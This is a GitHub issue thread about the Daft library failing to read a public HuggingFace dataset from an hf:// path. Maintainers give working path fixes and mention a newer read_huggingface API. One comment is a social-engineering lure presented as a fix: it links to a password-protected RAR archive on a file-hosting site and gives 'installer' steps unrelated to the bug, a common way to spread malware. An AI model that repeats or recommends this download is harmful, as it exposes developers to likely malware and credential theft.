### ISSUE TITLE
Can't read public dataset from HuggingFace

### ISSUE THREAD

**Issue by asmith26** [Eventual-Inc/Daft#2736]
**Describe the bug**
I'm trying to read the following HuggingFace dataset into Daft: https://huggingface.co/datasets/HuggingFaceM4/DocumentVQA

**To Reproduce**
Following https://www.getdaft.io/projects/docs/en/stable/user_guide/integrations/huggingface.html#reading-public-datasets

```python
import daft

df = daft.read_parquet("hf://HuggingFaceM4/DocumentVQA")
df
```

unfortunately yields:

```python
DaftCoreException: DaftError::External Generic http error: Invalid path: hf://HuggingFaceM4/DocumentVQA
```

**Desktop (please complete the following information):**
 - OS: Linux Mint 22 (based on Ubuntu 24.04)
 - Version: `getdaft v0.3.1`

**Additional context**
Many thanks for any help, and this amazing lib! :)

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Vince7778** [comment]
Hello,

Seems like our docs might be slightly wrong - you may need to add `/datasets/` into the URI, like `hf://datasets/HuggingFaceM4/DocumentVQA`.

**Comment by asmith26** [comment]
Can confirm this works! Many thanks :)

```python
import daft

df = daft.read_parquet("hf://datasets/HuggingFaceM4/DocumentVQA")
```

**Comment by asmith26** [comment]
This doesn't seem to be working again for me?

```python
>>> import daft
>>> daft.read_parquet("hf://datasets/HuggingFaceM4/DocumentVQA").show(3)
Traceback (most recent call last):
  File "<python-input-5>", line 1, in <module>
    daft.read_parquet("hf://datasets/HuggingFaceM4/DocumentVQA").show(3)
    ~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/tmp/a/.venv/lib/python3.13/site-packages/daft/api_annotations.py", line 39, in _wrap
    return timed_func(*args, **kwargs)
  File "/tmp/a/.venv/lib/python3.13/site-packages/daft/analytics.py", line 225, in tracked_fn
    result = fn(*args, **kwargs)
  File "/tmp/a/.venv/lib/python3.13/site-packages/daft/io/_parquet.py", line 90, in read_parquet
    builder = get_tabular_files_scan(
        path=path,
    ...<5 lines>...
        hive_partitioning=hive_partitioning,
    )
  File "/tmp/a/.venv/lib/python3.13/site-packages/daft/io/common.py", line 39, in get_tabular_files_scan
    scan_op = ScanOperatorHandle.glob_scan(
        paths,
    ...<5 lines>...
        hive_partitioning=hive_partitioning,
    )
daft.exceptions.DaftCoreException: DaftError::External Unable to open file https://huggingface.co/api/datasets/HuggingFaceM4/DocumentVQA/parquet/default/test/0.parquet: reqwest::Error { kind: Status(416, Some(ReasonPhrase(b"Requested Range Not Satisfiable"))), url: "https://huggingface.co/api/datasets/HuggingFaceM4/DocumentVQA/parquet/default/test/0.parquet" }
```

**Comment by colin-ho** [comment]
@srilman could you take a look at this?

**Comment by srilman** [comment]
@asmith26 Can you try reading from `hf://datasets/HuggingFaceM4/DocumentVQA/data` instead? I'm checking why the behavior changed, but this seems to work on the latest version

**Comment by asmith26** [comment]
Many thanks @srilman, can confirm `daft.read_parquet("hf://datasets/HuggingFaceM4/DocumentVQA/data").show(3)` works!

Would you like me to submit a PR to update your docs?

**Comment by srilman** [comment]
Sure that would be great. I'm still looking at when the regression happened and why, but it would be good to update it in the meantime

**Comment by colin-ho** [comment]
We support huggingface using the new `read_huggingface` api, e.g. 

`df = daft.read_huggingface("HuggingFaceM4/DocumentVQA")`

https://docs.daft.ai/en/stable/connectors/huggingface/
